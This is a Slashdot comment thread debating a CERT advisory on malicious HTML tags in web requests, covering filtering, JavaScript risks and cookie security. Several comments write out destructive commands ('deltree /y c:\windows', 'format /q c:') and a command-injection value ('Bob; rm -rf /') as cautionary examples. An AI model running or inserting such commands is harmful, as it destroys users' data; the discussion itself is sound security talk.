    I humbly disagree... DHTML, which is rapidly establishing itself as a nice way of deploying apps that do a lot of work on the client side, counts in a big way on scripting capabilities. Slashdot wouldn't be half as slow as it is if it didn't have silly perl scripts doing so much on the server side...

    This is your idea of a "key feature"?! Look, if the web needs menus, that's fine. But running scripts on the client side isn't the right way to add that feature. Anybody with half a brain could do a lot better.

    It was an example... thus, easy to pick on. The point was that scripting offers easy ways to make the browsing experience more friendly.

    Besides, what's the big deal about making it easy for newbies to add nice features to their web pages? Does EVERYTHING have to be so complex that only an experienced engineer can have nice pages? HTML became popular in the first place because it was accessible to the masses... Scripting extends this promise...

    The engineering circle has had years to do something about this crap. They didn't. Browser makers could have shipping their browsers with all client-side execution "features" disabled by default, all along. They didn't. They could have put up a warning popup that tries to scare the user whenever they turn on this stuff. They didn't. Who are you calling irresponsible?

    Fine. BOTH the browser makers and CERT. The solution, as I pointed out in my original post, is to put pressure on the browser makers-- preferably without creating a consumer panic. I think it is pure hysteria to be telling people to disable scripting because it is exploitable. There are a million and one leaks in security with modern computers. The size of the problem does not justify the change of creating a consumer panic.

  239. Re:Maliciousness by ctembreull · · Score: 1
    That's one side of it. However, the CERT advisory listed more than just the SCRIPT tag - it also mentioned OBJECT, APPLET and EMBED. Meaning things like evil ActiveX controls could be sent to and from a windows-based server. A malicious Java applet could be executed. And so on and so forth.

    You're right, the JavaScript side of it is very little more than an annoyance. But there's other things out there which are far, far more dangerous.

    HTH.



    Chris Tembreull
    Web Developer, NEC Systems, Inc.

    My opinions are my own, and nobody else's.

    --

    Chris Tembreull
    "My karma just ran over your dogma."
  240. Maliciousness by Da+Penguin · · Score: 1
    How much can you really do with some "evil" Javascript?
    Probably the most is to close the window or send a bunch of popups.
    This is not exactly formatting your hard drive.

    Ralph Furmaniak
    The Great AIP (Artificial Intelligence Project)

    1. Re:Maliciousness by DrMaurer · · Score: 2

      "How much can you really do with some "evil" Javascript?"

      A friend of mine visited a hacked sites archive on an IE5 machine (windows 98 SE), and it executed some funky javascript program and it caused a lot of memory errors (I think, I am not a good programmer) and other funny stuff.

      "Probably the most is to close the window or send a bunch of popups.
      This is not exactly formatting your hard drive. "

      Yes, yes it is. Given the amount of times a windows machine might be rebooted, it's easy to alter the Autoexec.bat file to say something like this

      deltree /y c:\windows

      and then

      format /q c:

      I've seen it done, and another friend, visiting the same archive site, but a different page, got majorly screwed because of javascript opening a file on disk and changing the contents (or just creating a file, overwriting the old one).

      http://www.2600.com has the site, I beleive, that both of them went to. So, when I went there on my linux box, I was unafraid. :-) Well, kinda. I mean, it is their fault, they said "Dangerous for windows users" right there next to the link.

      So, on my windows box, I made the autoexec and config files read-only. I don't know if it'll work, given windows ability to just override that kind of thing. I don't visit those sites.

      later

      --
      Dan
    2. Re:Maliciousness by Otis_INF · · Score: 2

      You don't need js to lock up a system via a browser. :) (Use a lot of nested tables in cells in a page. netscape will allocate a LOT of memory and use a lot of CPU cycles :)

      Javascript is a tool to get extra functionality at the client. IMHO you should use it as less as possible, but it CAN be handy sometimes. It's however a problem nowadays with the functionality added to the browser that is misused by sick minds.

      Disabling javascript is not the solution IMHO. Keeping up to date with the patches is.

      --
      Never underestimate the relief of true separation of Religion and State.
    3. Re:Maliciousness by TheGratefulNet · · Score: 3
      see www.jodi.org as an example of how JS can screw you over.

      for some windows users, their system may lock up very tightly. so while there's no direct harm in this, its rude as hell and is just another example of how client-side auto-executable code is a bad, bad, BAD thing.

      if you want web-based executables, they should properly execute on a server and NOT on the client.

      --

      --

      --
      "It is now safe to switch off your computer."
    4. Re:Maliciousness by autechre · · Score: 4

      On the browser end? Yes, there have been ActiveX exploits that are quite bad,
      including one which allowed--you guessed it--formatting of your hard drive.
      ActiveX was going at a rate of 1 exploit per week for a while, though it
      does seem to have quieted down a bit.

      On the server end, it can be far more serious. If you're using perl scripts,
      and your scripts accept input with any characters (ie, pathnames, executable
      code), you may quite easily be hacked. Ditto if you're using something like
      PHP and MySQL; if you accept SQL commands as valid input, you're krunked.

      I can't give concrete examples, because I don't feel skilled enough; however,
      one only needs to peruse the BUGTRAQ archives at securityfocus.com to see
      plenty of them.

      --
      WMBC freeform/independent online radio.
  241. We need a "true status" bar that works for us by GCP · · Score: 1

    This could be solved with a "true status" bar feature. You could choose to display either the True Status bar or the legacy status bar via your browser preferences, but the true status bar would be the default in new browsers.

    The true status bar could be a lot more informative than the one we have now in both major browsers. It would work for YOU, not for the website. It would tell you what things really MEANT when you passed the mouse over them before you ever clicked anything. It could blink or in some other way attract your attention if something seemed fishy on the page. For example, the visible anchor text appeared to contain a domain, but the HREF pointed to a different domain. Or if there were any <tags> in the URL text. Or if it noticed any tiny GIF on the page from a domain other than the domain of the page itself or with a URL that looked as though it contained more than a simple image name. Or light up a little chocolate chip icon if the page was using a cookie (click the cookie to allow or disallow it). Or if form data SUBMIT would submit the data to some domain other than the domain of the page. Or....

    That's what a true status bar should offer us, not a place for annoying scrolling text that blocks our view of the URL behind a link.

    --
    "Those who have never entered upon scientific pursuits know not a tithe of the poetry by which they are surrounded."
  242. Let's design a... by Munky_v2 · · Score: 1

    client sided script program that checks the HTML for these malicious tags before allowing the browser to run them.


    Munky_v2
    "Warning: you are logged into reality as root..."

    --
    Jay
    1. Re:Let's design a... by Munky_v2 · · Score: 1

      Actually it wouldn't be that hard, simply mimic the browser in the program, and have it return the theoretical result of the finished page.


      Munky_v2
      "Warning: you are logged into reality as root..."

      --
      Jay
  243. Re:This is new? by Mr_Icon · · Score: 1

    OK, I admit that. However, a "javascript:" link could easily be evaded by running an extra regexp that would make sure that only http: or ftp: links are permitted (easy as pie with PHP). With extra paranoia added, you can strip anything that is after an ampersand in the link, but that will break almost anything linking to a dynamic site (e.g. weather.com). Also, you can attach a big pop-up warning window to each link which will scream "THIS CAN BE A MALICIOUS LINK!!!!!!!!! YOU HAVE BEEN WARNED!!!!!!" (although I would never return to such a forum if I find one like it).

    I don't have this problem because of 5 forums that I am running, 4 strip all HTML-tags by changing to < and > ("htmlentities" function in PHP3), and the fifth one allows users simple XML formatting which is later parsed into HTML. The parser drops any tags it doesn't recognize.

    --
    If you open yourself to the foo, You and foo become one.
  244. Re:This is new? by Mr_Icon · · Score: 1

    Arggg!!! Ridiculous bug in slashdot!

    To slashdot coders:

    After you do a preview, you want to change all ampersands in escaped sequences (&) to &amp; before you place them in <textarea></textarea>. Otherwise all escaped tags (like &lt;) get unescaped within the textarea and second time get submitted plaintext (which isn't what the user wanted!).

    Write me if you don't know what I'm talking about.

    --
    If you open yourself to the foo, You and foo become one.
  245. This is new? by Mr_Icon · · Score: 1

    Hmmm? As a web developer I've always stripped any HTML tags or ran the submitted feedback through a parser that would only allow a limited set of formatting tags like "p", "a", and the like (a modified XML parser is good for that).

    Sooo... What's the news?

    --
    If you open yourself to the foo, You and foo become one.
    1. Re:This is new? by mistalinux · · Score: 2
      Hmmm? As a web developer I've always stripped any HTML tags or ran the submitted feedback through a parser that would only allow a limited set of formatting tags like "p", "a", and the like (a modified XML parser is good for that).

      Actually, you did not fix the problem.

      The "a" tag is how you create links, and the java script is embedded in the links itself. So allowing the "a" tag is nearly as bad as not filtering at all.

      Reading the advisory would tell you that :)

      --
      Sosumi. just kidding. DONT!
  246. Re:Works in Slashdot by koh · · Score: 1

    And the Proxomitron doesn't like your script, so it blew up the space between "return" and "true" :))) All I get is a jscript error.

    --
    Karma cannot be described by words alone.
  247. Re:This is really nothing new by AnarchoFreak_00 · · Score: 1
    Hmmm.... nasty...

    wonder how manu of us where acctally stupit enough to click on the link...

    ...oh well.. i guess thats makes me stupit

    - - -

  248. Re:Other issues by LazyBoy · · Score: 1
    I don't think any experienced users will have any problems with this. Anything you put in the comments will show up when the mouse cursor is over the document (well, not in lynx, but you get the idea...

    Not in WebTV either.

    --

    If Chaos Theory has taught us anything, it's that we must kill all the butterflies.

  249. Re:javascript is evil, as are all client-side scri by ectizen · · Score: 1

    I gotta agree with you on that one. That's why I stuck a single line of javascript on my homepage.
    If I forget to disable javascript, I get a very obvious red banner across the top of the page :)

  250. Re:attn: coders ... I second this! by gwalla · · Score: 1

    I'll submit this to buzilla as a feature request. Maybe somebody'll find the time to code it.


    ---
    --
    Oper on the Nightstar
  251. Where's the insecurity? by Otis_INF · · Score: 1

    I know this works (I just tried it in IE5), but I can't think of any security issues here. Can you please explain why this is a security issue (the about thing). As far as I can see, the html (even malicious) is parsed but you can never execute commands with it outside the browser. Or am I wrong? (and IMHO the about thing isn't a bug, it's a feature (honest) :)

    --
    Never underestimate the relief of true separation of Religion and State.
  252. Re: Why store password in cookies? (Use sessions) by hog2 · · Score: 1
    Of course you can. I guess you've never heard of sticky load balancing with a load manager and a session backup, eh?

    No, I haven't! Please explain further.

    --
    --Kirk
  253. Re: Why store password in cookies? (Use sessions) by hog2 · · Score: 1
    Yikes! It appears my knowledge on this is a little out-of-date. You can load balance and still use session variables.

    However, many guides do advise against using session variables, though not because of the load-balancing issues anymore. A quick search turns up one here. (I think this one is ASP-specific, though.)

    Another correction to my posting: since sessionIDs are generally stored in a cookie, users will still have to have cookies enabled if you're going to use session variables.

    --
    --Kirk
  254. Re: Why store password in cookies? (Use sessions) by hog2 · · Score: 1
    One reason you can't do that is if your site ever gets really big (like Slashdot), you can't load-balance over multiple servers.

    Also, cookies can last longer than sessions, so your site can recognize somebody the next time they visit.

    And, if you use cookies you don't really need to store the password in the cookie -- just the username. Keep the password in your database on the server. So, there isn't any additional security risk -- the only downside is that your users might have disabled cookies.

    Most web development guides recommend against using session variables.

    --
    --Kirk
  255. Old news by DrHyde · · Score: 1

    This is all old news. Any half way competent CGI scripter will have been aware of this for *years* and have already taken counter-measures on his server. The client issues are also well-known and obvious. I really can't understand why CERT bothered with this.

  256. Anti-Cert (Very Stupid People) by RetroCool · · Score: 1

    Cert is the most stupid place in the earth!!!
    Have you cert a moderator inside you???
    This topic is very old, and everybody in the computer security community knows about it
    Why put an advisory?
    You guys, don't have anymore to say about security?
    I don't know if somebody from cert is sending these advisories to slashdot, but in the previous case, somebody sent an advisory for the problem with rsaref (buffer overflow) , but Core SDI discovered this bug
    And I think, again, this was not a clean news.

  257. Re:Works in Slashdot by Anomalous+Canard · · Score: 1

    My browser is configured not to run Javascript, so clicking your link does nothing here.

    Anomalous: inconsistent with or deviating from what is usual, normal, or expected

    --
    Anomalous: deviating from what is usual, normal, or expected
    Canard: a false or unfounded repor
  258. Re:Put whatever controls you want into Mozilla by xeroh · · Score: 1

    you need to make your .sig scan better

  259. Re:Security Advisories by carlos_benj · · Score: 1

    So, are you saying that all these CERTs contain a drop of Retsyn?

    http://www.certs.com/

    --

    --

    As a matter of fact, I am a lawyer. But I play an actor on TV.

  260. Use Lynx by argoff · · Score: 1

    You'd be supprised how many of these problems could be avioded by simply using Lynx (the text based browser) whenever you can. It also gives you much better controll over cookies.
    Also, run in an xterm - you can use it to view graphics and sound. I also like the how it gives me more control over those annoying frames, and makes those adds less in the way. ...Just my 2 cents.

  261. Re:Works in Slashdot by GhOsT_ID · · Score: 1

    Excellent job :-)

  262. javascript is evil, as are all client-side scripts by TheGratefulNet · · Score: 1
    I always browse sites with JS disabled. and if functionality exists only in JS, I look at the source first and determine if its really necessary or even if I can get info directly via pure .html.

    figuratively speaking: if you open your door too much, why should you be surprised that some riff-raff came in?

    --

    --

    --
    "It is now safe to switch off your computer."
  263. Too obvious to deserve attention from CERT by bcilfone · · Score: 1

    Verifying client input to the server has been an issue since NCSA developed CGI. As a web site programmer (not designer), you should assume that every byte coming from the client is malicious. That way, things like this do not affect you.

    I remember seeing example bad perl scripts that made system calls like:

    system( "./db_insert $in{name}" );

    or something like that, where db_insert was just some unix executable and $in{name} represents the CGI form input variable "name". If you say your name is "Bob" or something, it works fine. If you say your name is "Bob; rm -rf /", then there is some excitement.

    The only way to be safe is to trust no one. Disable javascript, unplug your computer, and burn down your house.

    Jesus may love you, but I think you're garbage wrapped in skin.

  264. No, the solution is.... by JudgePagLIVR · · Score: 1

    not to write secure web pages that allow html to be used. I mean, it's fine to allow html on a chat forum (like this one), but on a credit card form? I hope there aren't any real ites out there that are that unsecure.

    --
    Judge Pag, the Learned, Impartial, and Very Relaxed
  265. Re:Does Amazons "one click shopping" fall under th by Stormwind · · Score: 1

    Can someone confirm/check if there are safeguards (eg referrers) that stop this simple abuse of OneClickShopping?

    The simplest safeguard is not clicking on links in spam e-mails. The next simplest is not to accept e-mail from addresses like 294738fe322fhwei2@hotmail.com.
    YMMV

  266. Re: Site is down by Chester+K · · Score: 1

    CERT must have decided that because of the inherent security flaws in tags in HTML, that they'd better deny access to the HTML versions of their advisory or someone might hax0r it. :-)

    --

    NO CARRIER
  267. Here's an Example Exploit of It by Chester+K · · Score: 1

    And here's an example of it actually being used:

    Click here to see

    Give me a break if it doesn't work, I just whipped this up in a couple minutes.

    --

    NO CARRIER
  268. doh! by Chester+K · · Score: 1

    Nevermind, my fault.

    My URL decoder was stripping off certain characters. I can see the user number and password clearly now.

    --

    NO CARRIER
  269. So how do we secure this? by Chester+K · · Score: 1

    The cookie contains a user number and your password in cleartext. Even if the change password form requires you to type your old password... it's right there in the cookie and could easily be put into a URL to change the password.

    Require the user to enter their user name too? Maybe... is there any way to get the user name from the user number? At first glance, I can only see a way to pull up user information by user name, not by user number.

    If there's a way to correlate user name and user number? Maybe by peeking at the page via scripting? Slashdot makes it easy and puts your username on every page. A quick parse over an innerText property would retrieve it.

    So IS there a secure way to do it? Is there even a way to totally avoid users from entering URLs like this... when URL-encoding has plenty of legitamite uses?

    --

    NO CARRIER
  270. Re:Watch before you click. by uid8472 · · Score: 1

    And all this time I thought it was Donna Karen (sp?). Go figure. I always look at links before I click them. Which, conveniently, will also deal with some of the problems mentioned in the advisory: if you notice a link has a tag or something suspicious in it then don't follow it. Many security holes can be stopped by common sense.

  271. I hate that by rellort · · Score: 1

    Dammit. I hate it when the reply is funnier than my original post.

    --

    -- In the future, everyone will code Perl for 15 minutes. --
  272. Solution?? by Anonymous Coward · · Score: 2
    One of the nice differences between *nix and M$ is that *nix actually has a real concept of separate user contexts. My browser settings are held in MY directory subject to MY permissions, etc. I can also install/use software in my home directory - root doesn't have to do it (unlike NT which frequently requires administrator access to install user software).

    Therefore...

    Why not isolate browsing? I need to do some research and try some things as this is not a strong area for me but perhaps someone has some comments/ideas on the following possibilities:

    1) Create a separate user (say "surf") and only browse as that user. Give your normal user read access to that user's files but strictly limit surf's power. This would at least limit the possible damage from evil scripts. OK for a one user desktop setup but a problem for multiple users.

    2) Isolate browsing to a specific user subdirectory. Any ideas on how practical this would be? I am guessing that one would have to set up a different user with permissions only to that subdir and browse as that user. Or, could chroot be used to limit the browser's access or would that block too many library/system calls?

    3) Create a /surf/ tree with the browser software and /surf/user directories. Only allow browser access to the surf tree (even chroot?). Each user would have a subdirectory with appropriate permissions for their browser files (saved files, .browsersetup, etc.). A link from the normal home directory to the /surf/user directory could make this fairly transparent to the end user.

    Any other ideas? We should be able to beat this problem at least in the *nix world by limiting the power of the browser.

  273. Its OK by Anonymous Coward · · Score: 2

    My Microsoft Internet browser protects me from bad things like this. I don't think Microsoft would be such a successful company if the allowed hackers to hurt their users. There are a lot of really smart people at Microsoft and I'm sure they have fixed any problem that might happen because of this.

    P.S. I also practice safe computing as Microsoft has told me, it is important to avoid "bad internet zones"!

  274. It's called junkbuster by hawk · · Score: 2

    Get it as part of your distribution (the bsd port is "ijb"), or at www.junkbuster.com.

    It works wonderfully. I rarely see blinkies anymore, and there are only two sites than can give me cookies, and a third that can retrieve one that it can't change.

  275. Re:Put whatever controls you want into Mozilla by Frodo · · Score: 2

    When Mozilla becomes a usable browser, this argument becomes valid. Not that I expect this to happen next N years, N>=1.

    --
    -- Si hoc legere scis nimium eruditionis habes.
  276. New hole?? by Frodo · · Score: 2

    That's what passes nowdays for a new hole? I, far from being security expert, wrote patches for guestbooks on this subject about 3 years ago. It's just obvious you should think about this. Isn't this why I see "allowed HTML" here below?

    Now just what we lack is somebody patenting idea of fixing this "new hole"...

    --
    -- Si hoc legere scis nimium eruditionis habes.
  277. Re:CERT Irresponsibility by tzanger · · Score: 2

    The engineering circle has had years to do something about this crap. They didn't. Browser makers could have shipping their browsers with all client-side execution "features" disabled by default, all along. They didn't. They could have put up a warning popup that tries to scare the user whenever they turn on this stuff. They didn't. Who are you calling irresponsible?

    As an engineer I can say that this isn't always the case. You work to see most of the gotchas of doing something a certain way and even <i>with</i> peer review and countless trials, you can't forsee every consequence.

    Turning everything off by default makes your product harder to use, so you lose customers and therefore sales. (with browsers being free this blurs the line but the effect is the same)

    Making screens popup all the time is annoying to the customer. There are lines to be drawn all over the place. Often they get drawn wrong, but that's often the fault of management, not the guys who actually do it. He who writes your paycheck gets final say. Not everyone is fortunate (or wealthy) enough to walk whenever they can't agree with management on all issues.

  278. Security Advisories by jd · · Score: 2
    This advisory basically states that it is potentially possible to do extremely destructive things with HTML, especially given all the extensions.

    I therefore expect the following advisories to be put out:

    2001: The tags added in response to the CERT Advisory on Malicious HTML Tags can be exploited by embedding HXDHTML (Hyper eXtended Dynamic HTML) that can run arbritary code and a coffee maker over a supposedly secure link.

    2002: The tags added in response to the CERT Advisory relating to the CERT Advisory on Malicious HTML Tags can be exploited by embedding sections of Bill Gate's brain, which can execute random fragments of assembly that can result in a Denial of Service attack.

    2003: The tags added in response to the CERT Advisory relating to the CERT Advisory relating to the CERT Advisory on Malicious HTML Tags can be exploited by a child of 3 just by sneezing. NOW WILL YOU STOP ADDING THESE B***** TAGS AND SECURE YOUR PROGRAMS!

    --
    It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
  279. Re:Am I missing something? by pridkett · · Score: 2

    Yes, that would be correct. I was at work and not thinking right. This shows something though, it's actually REALLY hard to type messages like that because of the &lt; that you have to type to have it show < and don't even get me started on quoting.

    --
    My Slashdot account is old enough to drink...
  280. There is a fix... by Skim123 · · Score: 2

    Disable JavaScript. :) Couldn't be easier...

    --

    I could not justify my existence if I were a turkey farmer. Would I terminate myself? Undoubtably, yes.

  281. ...system that could easily be ISP-abused! :-) by Sesse · · Score: 2

    Well, the issue then boils down to who has the right to execute scripts. OK, it might sounds a little strange (and I'm not sure my explanation will clear up things either), so let me try to explain...

    If I have my homepage somewhere in the other-hosts-it-for-me world (say Xoom, or AOL for that matter), and they suddenly decide that "JavaScript is a security risk". They simply modify their server to turn off all JavaScript, and BOOM! My JavaScript breaks, and I have no way to get around it. Are they allowed to do this? Probably, yes. Should we try to stop it? Yes! ;-)

    Anyway, the system you're proposing doesn't fit well into HTML. A tag should be composed of a start-tag and an end-tag, not two empty tags with different attributes. Of course, having a `normal' HTML tag would again lead to security problems. I think the best way to solve this problem is parsing the HTML, and allowing only the tags one wants (like Slashdot does -- I'm sure some useful code could be extracted out of slash 0.9).

    /* Steinar */

    --
    (This comment is of course GPLed.)
  282. Re: Site is down by Sesse · · Score: 2

    No, it's not down -- the advisory itself is just so secure, we can't get to it. (I get a 403.)

    /* Steinar */

    --
    (This comment is of course GPLed.)
  283. Re:Interesting and valid security hole by Ed+Avis · · Score: 2

    When writing CGI programs with Perl and CGI.pm I use a wrapper for getting URL parameters which will check them to ensure they contain only the characters [a-zA-Z0-9_]. It's not necessary most of the time, but it does help protect against new attacks that might be discovered, like this one.

    In my opinion, strings passed as URL parameters should be human-readable so that the URL makes some sense; if you're passing long chunks of data such as HTML, it's better to do that with a POST request, which you should also validate thoroughly. So it's no great hardship to insist that HTML tags, hidden null bytes and so on aren't allowed in URLs.

    --
    -- Ed Avis ed@membled.com
  284. Duh? by Jeffrey+Baker · · Score: 2
    I don't think this is really newsworthy. Of course you need to scan the user input to make sure it contains only elements in a specifically defined set of elements. You should search for onClick, onMouseOver, on* javascript events, FORM and SCRIPT elements, and anything else that doesn't fit a strictly predefined list of allowable input.

    I thought people knew this stuff. At least slashdot seems to get it right.

    -jwb

  285. this is a hard issue; your list of tags isn't safe by Marc+Slemko · · Score: 2
    This is just a demonstration of the fact that this isn't a trivial issue. The above list of tags appears to allow

    through. Now, when I tried it, slashdot didn't accept it, but that is another issue.

    Some browsers (especially IE) allow lots of attributes to lots of tags that you wouldn't normally think of as dangerous.

  286. but roxen is. by Marc+Slemko · · Score: 2

    It is very true that not all webservers are impacted by this issue.

    However, just because a company had not released information about their problems doesn't mean they don't have them. In Roxen's case, it has obvious issues, at least with the 404 page on the server at http://www.roxen.com/

    The purpose of this post isn't to point at vendors and laugh, but to drive home the point that far more things are vulnerable than you may think. Apache, IIS, Netscape Enterprise (or whatever it is called now), Zeus, thttpd, WebSitePro... that should cover a majority of sites. Some are less vulnerable (Apache), some more (no names).

    It is also important to remember that the webserver itself is only the smallest part of the issue. If the problem could be fixed by just patching your webserver, it would be nowhere near as big of an issue.

  287. Re:Put whatever controls you want into Mozilla by UncleRoger · · Score: 2
    you can get and hack your own private copy of Mozilla

    Yes, in theory.

    For some of us, our strengths lie not in writing code, but in identifying valuable features and usable interfaces.

    Those that ignore such talented (albeit different) voices are doomed to live in a world where the majority settles for crap (like windows) because it is at least usuable, even if it isn't elegant or efficient from a technical point of view.

    --
    Stupid people will be persecuted to the fullest extent allowed by law.
  288. Re:Put whatever controls you want into Mozilla by UncleRoger · · Score: 2
    Translation 1: I'm too lazy to learn how to do anything -- someone do my work for me.

    I didn't say I (or anyone else) couldn't write code; I said that our strengths lay elsewhere. You must be a true newbie if you've never run across someone who really just wasn't such a great programmer, no matter how hard they tried, or how much they studied.

    And of course, when you want to see a movie, you go film/act/direct/produce it yourself. And you do all your own cooking (you never eat in restaurants since you've yet to find someone who can cook as well as you do.) You don't bother to play any video games other than the ones you developed, since you're the best game designer there is. You write your own novels, too. Naturally, you do all your own auto repairs, and home repairs, and you take your own trash to the dump, and you only listen to music you've written/performed/recorded.

    My, my, aren't we the Heinleinesque ideal?

    Translation 2: I'm best suited for telling others what to do.

    Well, not me personally, but yes, there are those whose strengths lie in managing projects. They know how to motivate people, and can effectively run interference between the people that do the work and those whose job it is to prevent them (upper management). Generally, they aren't what would be called a geek, but the better ones (in the high-tech industries, anyway) are at least technologically aware.

    But of course, you're the ultimate superman, doing everything yourself because your the best person for every job.

    As for me, personally, I've been told that I'm really good at designing usable interfaces and explaining things to the non-technical. So I've done some teaching, a fair bit of tech support, a lot of specs, and quite a bit of coding. (Mind you, I wouldn't bet I was coding before you were born, but it wouldn't surprise me.)

    Oh, no, wait a sec -- I've got a list of nifty ideas for projects right here. As soon as I dig 'em up, I'll expect you to get to work...

    Thanks, but no thanks. I'm currently working way too much, and have a ton of projects of my own, ranging from writing documentation, to rewriting a couple of systems in Java, to finishing a number of web sites, to getting the stupid computer in the bedroom to see the network again, after swapping ethernet cards.

    But sure, e-mail me with your list of projects. If any of them have merit, and I can find the time, I'll work on them, and make the money from them. I'm not too proud to think that others may have good ideas (perhaps even better than my own) and put them to use.

    Which leads me to the point I made originally (and that you missed) -- when someone offers a suggestion in an area that is not your area of expertise, take advantage of it.

    --
    Stupid people will be persecuted to the fullest extent allowed by law.
  289. I was just talking about this last weekend. by Kris_J · · Score: 2
    I spent some time last weekend speaking to a person that used to sell a database package with a web interface. I was trying to demonstrate that because the package performed no filtering for HTML code in entered text, a malicious user could essentially do anything, eBayla-style - I demonstrated with an iframe. She was amazed.

    I've been developing stuff for this database package at work for about a year now. It's purely internal. I use this issue to pull off cute stuff in comments fields, like bulleted lists, font colours, bold, etc - just like /. - but I know it's capable of much more. When we make info public we're unfortunately going to have to disallow data entry because of this flaw, or we're going to have to upgrade to another version of the software (and I'm going to have to spend 6 months in hell whacking into brand new problems... )

    BTW: Anyone know if the UBB filters this stuff?

  290. Re:Put whatever controls you want into Mozilla by SurfsUp · · Score: 2

    When Mozilla becomes a useable browser, this argument becomes valid. Not that I expect this to happen next N years. >>-1.

    Others may have a different opinion.

    (This comment posted with Mozilla M14 nightly build)

    --
    Life's a bitch but somebody's gotta do it.
  291. This is news? by joshv · · Score: 2

    This just basically points out a basic security flaw in the entire web programming model. As far as I know exploits that take advantage of the vunerabilities described in the advisor have been around for quite some time.

    It is entirely up to the web site to validate the data entry of its users. Unfortunately you cannot trust every web site you use to catch every possible exploit. If you are worried about it, disable JavaScript/VBScript.

    To fix this problem would require some enforced CGI-coding standards or certification programs for web sites - "We use only Web-Guard 2.0 certified server side scripting tools to keep you safe from script kiddies!"

    -josh

  292. This is a no brainer by kevlar · · Score: 2

    There's no reason why anyone should be remotely alarmed by this. If you have any decent security in your website, then you filter everything between code here(-- did they appear?). As for adding that crap to a link, anyone who knows what a QUERY_STRING is, knows that this can be done. So in all reality, there's nothing remotely alarming here. If there were good browser security on the client side to begin with, then this wouldn't be an issue at all.

    1. Re:This is a no brainer by Salamander · · Score: 2

      >anyone who knows what a QUERY_STRING is

      Aye, there's the rub. This may seem like "common knowledge" to you or to the many other web-wankers out there, but in fact neither the typical user nor most kinds of computer specialists outside of your narrow little specialty know (or should know, or should have to care) what a QUERY_STRING is. In fact, I'll bet a large number of web-wankers, unschooled as you lot tend to be before you start proclaiming yourselves gurus, don't know what a QUERY_STRING is either because you never see one behind the layers of cruft in a web "authoring" tool someone with marginally more talent than you provided.

      And that is more than "remotely alarming". The real issue is that idiots can and do create web pages, so we need something that's safe to use even when those idiots are involved.

      --
      Slashdot - News for Herds. Stuff that Splatters.
  293. Re:Interesting and valid security hole by sammy+baby · · Score: 2

    Actually, that isn't too hard, on either Linux or Windows 9x (haven't tried it on NT or 2000). Under Linux, pop open your /etc/hosts file and make an entry for each site at 127.0.0.1. All those requests will get sent right back to you, at which point they die the death.

    Same thing under Windows, except the file is C:\Windows\hosts. (There's a sample file located at C:\Windows\hosts.sam. Rename it to get it to work).

    If you're using Internet Explorer, you can use custom "security zones" to assign arbitrary permissions to pages. I don't think you can use it to block a site entirely, but you can disable cookies, java, javascript, activeX, yada yada.

    Finally, any proxy server or firewall worth its salt will allow you to restrict access to certain web sites.

  294. Re:Interesting and valid security hole by NMerriam · · Score: 2

    "This one really took me by surprise as a web developer."

    Not much of a web developer are you? :-)


    I knew someone would have that reaction.

    let me clarify: I build web sites. I design pages, write HTML and do wonderful things like that. I don't build databases, enact security measures, or enable filtering or processing of form input. I'm not at all involved in developing the format of URLs or the formats in which we accept data. I build web sites, not networks or security protocols.

    That said, as a "web developer", I'm perfectly aware of what CERT says:

    When client-to-client communications are mediated by a server, site developers explicitly recognize that data input is untrustworthy when it is presented to other users. Most discussion group servers either will not accept such input or will encode/filter it before sending anything to other readers.

    And I doubt, as they do, that many people do no processing whatsoever on public data. the issue at hand is what happens to private data, which CERT seems to think (and I tend to agree with them) not so many developers get concerned about.

    I can certainly think of situations (like, say, a free web hosting service or web-based email) where having HTML more complex than bold, italic, etc would be desired as input.

    --
    Recursive: Adj. See Recursive.
  295. Re:Am I missing something? by takshaka · · Score: 2
    Assuming you meant s/<(\/){0,1}\s*b\s*>/<$1b>/gi so that the tags are properly closed, then <b> becomes . How can I type a b between angle-brackets then?

    Nitpicks aside, you're right. Most people have been handling crap like that since Netscape thought up <BLINK>

  296. Re:CERT Irresponsibility by Black+Parrot · · Score: 2

    > Following CERT's recommendations amounts to disabling a vast part of the web's functionality entirely

    Yeah...disables exactly the parts I want disabled, which is why I turned off Javascript about a year before the CERT advisory.

    --
    It's October 6th. Where's W2K? Over the horizon again, eh?

    --
    Sheesh, evil *and* a jerk. -- Jade
  297. Re:attn: coders by WNight · · Score: 2

    Sure, telling lynx to represent itself as a browser capable of keen graphics effects, or telling Netscape 3 to identify itself as something capable of DHTML, etc, is silly, and you deserve the messy page you get. But, telling a browser to identify itself as any other browser, and to behave like it if possible, makes sense. I can do it, with Junkbuster, if I wish, but I usually leave it transparent, because any IE only page isn't a page I'll ever visit.

    You could have a IE5 filter on Mozilla that would take a page and render it like IE5, complete with whatever bugs. That would be funky. And add filters for all main browsers, so a web designer could check behavior in many browsers without having them all installed.

  298. Re:attn: coders by WNight · · Score: 2

    How would that be hard? Just get the browser to substitute their ActiveX control for a similar one set to return a random number. It might also be possible to trap these opcodes, so that a system util could return any specified number to any program which asked, unless that program was run at OS level (which not much is, ideally.)

    Anyways, you control your machine and the software on it, spoofing an ID number isn't hard.

    You could do it by trapping the ID check request.

    You could do it by subverting the applet that checks.

    You could do it by watching outgoing packets to the intel site and replacing the ID with a fake one.

    etc.

  299. Re:attn: coders by WNight · · Score: 2

    Perhaps this would work best as a browser addon, where you (for instance) install Junkbuster the pluggin, and it modifies a few browser menus and displays, and does this. The browser could pass all request, incoming html, etc, through specific filters, so any program that wanted could fit as a filter, saving you from having to install a proxy for what is really just a filtering job.

  300. Re:No defense against careless clicking. by Webmonger · · Score: 2

    You're right, of course, that this is a weakness of JavaScript, not SlashDot. And that it's similar to a plain link to a malicious site. But there are a couple of other factors:

    1. If a malicious link were posted on your site, I would be able to take some kind of action against you.

    2. I may have told my browser to "trust" slashdot, but not your site.

  301. Re:Put whatever controls you want into Mozilla by Nodatadj · · Score: 2

    This really depends on a number of points
    a) Coding skill
    b) The time you have
    c) Whether or not you can get a working copy of Moz to compile on your machine - I've never managed it and I've been trying regularly since March 99

  302. A possible partial solution? by ABadDog · · Score: 2

    Simply, the proposal is this. The server itself should *optionally* scan for and block any potentially malicious code in GET or POST requests, before they're passed to the handler. Yes, this would eliminate a large number of potentially useful uses of scripting, but a server administrator who had turned on this option would know that the site was secured against such attacks, rather than the security being up to *every* cgi script on the machine.

    There could even be several levels of such scanning, for instance blocking all html tags in client requests, or only a subset of such tags, or no blocking.

